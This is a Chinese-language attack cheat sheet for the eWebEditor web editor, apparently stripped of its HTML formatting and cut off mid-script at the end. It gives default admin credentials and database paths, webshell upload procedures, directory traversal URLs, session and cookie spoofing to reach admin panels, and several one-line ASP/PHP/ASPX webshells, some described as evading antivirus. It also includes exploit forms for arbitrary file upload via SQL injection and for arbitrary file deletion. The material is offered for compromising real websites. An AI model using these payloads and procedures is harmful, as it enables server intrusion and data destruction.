编辑器漏洞合集

ewebeditor：基本知识：默认管理页地址2.80以前为ewebeditor/admin_login.asp以后版本为admin/login.asp(各种语言的大家自己改后缀）默认帐号密码为adminadmin888！常用的密码还有adminadmin999admin1等默认数据库路径为ewebeditor/db/ewebeditor.mdb常用数据库路径为:ewebeditor/db/ewebeditor.asaewebeditor/db/ewebeditor.aspewebeditor/db/#ewebeditor.asaewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.aspewebeditor/db/ewebeditor1033.mdb等很多管理员常改.asp后缀，一般访问.asp.asa点击“样式管理”--可以选择新增样式，或者修改一个非系统样式，将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer，只要是服务器允许执行的脚本类型即可，点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式，点击插入图片，上传WEBSHELL，在“代码”模式中查看上传文件的路径。当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell1、eWebEditor踩脚印式入侵：当我们下载数据库后查询不到密码MD5的明文时，可以去看看webeditor_style(14)这个样式表，看看是否有前辈入侵过或许已经赋予了某控件上传脚本的能力，构造地址来上传我们自己的WEBSHELL.攻击利用比如ID=46s-name=standard1构造代码:ewebeditor.asp?id=content&style=standardID和和样式名改过后ewebeditor.asp?id=46&style=standard12、eWebEditor遍历目录漏洞：ewebeditor/admin_uploadfile.aspadmin/upload.asp过滤不严，造成遍历目录漏洞攻击利用：目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp高版本的是ewebeditor/admin/upload.asp文件第一种:ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加&dir=../..&dir=****.com/../..看到整个网站文件了第二种:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..eWebEditor5.2列目录漏洞=standard650&dir=…././/…././/admin3、WebEditorsession欺骗漏洞,进入后台：漏洞文件:Admin_Private.asp只判断了session，没有判断cookies和路径的验证问题。攻击利用：新建一个.asp文件，内容如下:%Session(“eWebEditor_User”)=“123132323″%然后访问这个文件，再访问ewebeditor/admin_default.asp！欺骗进入后台！4、解决eWebEditor漏洞上传文件500错误：eval的一句话有时候会失败execute的一句话基本上都是成功的!ASP一句话1.%evalrequest(YouPass)%2.%executerequest(YouPass)%3.%execute(request(YouPass))%免杀大部分网站的一句话4.%setms=server.CreateObject(MSScriptControl.ScriptControl.1)ms.Language=VBScriptms.AddObjectResponse,Responsems.AddObjectrequest,requestms.ExecuteStatement(ev&al(request(YouPass)))%免杀部分网站过略%,%的一句话5.scriptlanguage=VBScriptrunat=serverexecuterequest(YouPass)/script%gt;免杀部分网站过略双引号的一句话6.%evalrequest(YouPass(35))%php一句话7.?phpeval($_POST[YouPass]);?aspx一句话8.scriptlanguage=C#runat=serverWebAdmin2Y.x.yaaaaa=newWebAdmin2Y.x.y(5、eWebEditorasp版2.1.6上传漏洞：H1ewebeditorasp版2.1.6上传漏洞利用程序----/H1brbrformaction==save&type=IMAGE&style=luoye'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrlfromewebeditor_stylewheres_name='standard'and'a'='amethod=postname=myformenctype=multipart/form-datainputtype=filename=uploadfilesize=100brbrinputtype=submitvalue=Fuck/form修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件.6、eWebEditor2.7.0注入漏洞：=article_content&style=full_v200默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，7、eWebEditor2.8.0最终版删除任意文件漏洞：此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入。EXP:HTMLHEADTITLEeWebEditor删除文件by:oldjun()/TITLEstylebody,p,td,input{font-size:9pt}/style/HEADBODYahref='list.asp'新闻列表/a|ahref='add.asp'增加新闻/ab增加新闻/bformaction==postname=myforminputtype=hiddenname=d_originalfilenameinputtype=hiddenname=d_savefilenametablecellspacing=3align=centertrtd要删的文件(相对路径就可以了)：/tdtdinputtype=textname=d_savepathfilenamevalue=size=90/td/trtrtd新闻标题(随便填)：/tdtdinputtype=textname=d_titlevalue=size=90/td/trtrtd标题图片：/tdtdselectname=d_picturesize=1optionvalue=''无/option/select当编辑区有插入图片时，将自动填充此下拉框/td/trtrtd新闻内容(随便填)：/tdtdtextareaname=d_content/textarea/td/tr/tableinputtype=submitname=btnSubmitvalue=提交inputtype=resetname=btnResetvalue=重填/form/BODY/HTML删除文件漏洞一般是配合其他漏洞使用的，比如目录遍历！8、PHP≥3.0~3.8与asp2.8版PHP/ASP…后台通杀漏洞：进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=adminuser=+escape(admin));javascript:alert(document.cookie=adminpass=+escape(admin));javascript:alert(document.cookie=admindj=+escape(1));而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php，就会直接进去。9、ewebeditorphpv3.8orolderversion任意文件上传漏洞：此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格，并定义上传类型。攻击利用:EXP:formaction=method=postenctype=multipart/form-dataINPUTTYPE=hiddenname=MAX_FILE_SIZEvalue=512000URL:inputtype=textname=urlvalue==100brINPUTTYPE=hiddenname=aStyle[12]value=toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1file:inputtype=filename=uploadfilebrinputtype=buttonvalue=submitonclick=fsubmit()/formbrscriptfunctionfsubmit(){form=document.forms[0];form.action=